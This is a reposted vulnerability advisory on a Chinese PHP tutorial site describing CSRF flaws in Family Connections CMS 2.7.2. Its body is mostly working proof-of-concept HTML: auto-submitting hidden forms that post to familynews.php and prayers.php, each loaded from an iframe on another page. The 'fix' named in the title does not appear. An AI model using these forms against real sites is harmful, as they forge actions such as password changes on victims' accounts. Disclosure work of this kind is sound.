网站地图    收藏   

主页 > 后端 > 网站安全 >

FCMS_2.7.2 cms and earlier多个CSRF缺陷及修复 - 网站安

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 下载地址:http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.7.2/FCMS_2.7.2.zip/download作者: Ahmed Elhady Mohamed影响版本: 2.7.2测试平台: windows XP Sp2 En概述# ......

下载地址:http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.7.2/FCMS_2.7.2.zip/download 

作者: Ahmed Elhady Mohamed 

影响版本: 2.7.2 

测试平台: windows XP Sp2 En 

 

概述  

 

# This vulnerability allows a malicious hacker to change password of a user 

 

and also it allows changing the website information. 

 

=================================================================================== 

 

  

 

#First we must install all optional sections during installation process. 

 

        

 

#there are csrf in all sections in this application for examples you can add news , pray for ,  

 

change the password and can do all functionalities are there. 

 

      

 

#here are some examples for prove of concept 

 

      

 

  

exploit code for Page "familynews.php"

 

 

    #Save the following codr in a file called "code.html

 

  

 

        <html> 

 

            <head> 

 

                <script type="text/javascript"> 

 

                    function autosubmit() { 

 

                        document.getElementById('ChangeSubmit').submit(); 

 

                    }    

 

                </script> 

 

            </head> 

 

            <body  onLoad="autosubmit()"> 

 

                <form method="POST"  action="http://www.2cto.com /FCMS_2.7.2/FCMS_2.7.2/familynews.php"  id="ChangeSubmit"> 

 

                    <input type="hidden"  name="title"  value="test" /> 

 

                    <input type="hidden"  name="submitadd"  value="Add" /> 

 

                    <input type="hidden"  name="post"  value="testcsrf" /> 

 

                    <input type="submit" value="submit"/> 

 

                </form> 

 

            </body> 

 

        </html> 

 

  

 

  

 

      

 

    #then i called "code.html" from another page  

 

  

 

    <html> 

 

        <body> 

 

            <iframe  src="code.html" onLoad=""></iframe> 

 

        </body> 

 

    </html> 

 

  

 

  

 

exploit code for Page "prayers.php"

      

 

    #Save the following code in a file called "code.html" 

 

    <html> 

 

        <head> 

 

            <script type="text/javascript"> 

 

                function autosubmit() {  

 

                    document.getElementById('ChangeSubmit').submit(); 

 

                }    

 

            </script> 

 

        </head> 

 

        <body  onLoad="autosubmit()"> 

 

            <form method="POST"  action="http://www.2cto.com /FCMS_2.7.2/FCMS_2.7.2/prayers.php" id="ChangeSubmit"> 

 

                <input type="hidden"  name="for"  value="test" /> 

 

                <input type="hidden"  name="submitadd"  value="Add" /> 

 

                <input type="hidden"  name="desc"  value="testtest" /> 

 

                <input type="submit" value="submit"/> 

 

            </form> 

 

          

 

        </body> 

 

    </html> 

 

      

 

    #then i called "code.html" from another page  

 

  

 

    <html> 

 

        <body> 

 

            <iframe  src="code.html" onLoad=""></iframe> 

 

        </body> 

 

    </html> 

 

  

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论